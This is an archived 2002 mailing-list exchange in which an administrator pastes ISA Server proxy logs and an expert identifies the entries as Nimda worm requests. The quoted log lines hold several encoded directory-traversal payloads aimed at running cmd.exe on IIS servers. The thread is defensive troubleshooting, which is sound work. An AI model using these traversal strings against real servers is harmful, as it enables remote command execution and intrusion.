Re: ISA logs.

  • From: "Jim Harrison" <jim@xxxxxxxxxxxx>
  • To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
  • Date: Tue, 26 Feb 2002 06:33:17 -0800

Those are Nimda requests.
Since the sc-result code is 401 for all of them, it appears that ISA may be
allowing them to pass.
"401" could be coming from ISA or the IIS service.
What entries do you find in the IIS logs?

Jim Harrison
MCP(NT4, W2K), A+, Network+, PCG
http://isaserver.org/authors/harrison/
Read the books!

----- Original Message -----
From: "Vinaykumar G" <G.Vinay@xxxxxxxxx>
To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
Sent: Sunday, February 24, 2002 19:44
Subject: [isalist] ISA logs.


http://www.ISAserver.org


Hi Jim,
       This is what iam getting in the ISA logs and I have denoted
xxx.xxx.xx.xx is pointing some valid IP on the Internet. Then if the IP is
valid one on the Internet then these scripts are coming from internet.
Please confirm as what has to be done to stop these scripts being executed.

xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:04
w3proxy ISA - www - - - 145 3518 http
TCP GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:08
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:08 w3proxy
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:10
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:11 w3proxy anonymous
- N 2002-02-23 05:57:11 w3proxy ISA - www
- - - 97 3518 http TCP GET
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13
w3proxy ISA - www - - - 98 3518 http
TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:15
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
-
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:17
w3proxy ISA - www - - - 100 3518 http
TCP GET
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -

Regards,
vinay.


------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
jim@xxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')

Other related posts:

  1. Home
  2. isalist
  3. Archive
  4. 02-2002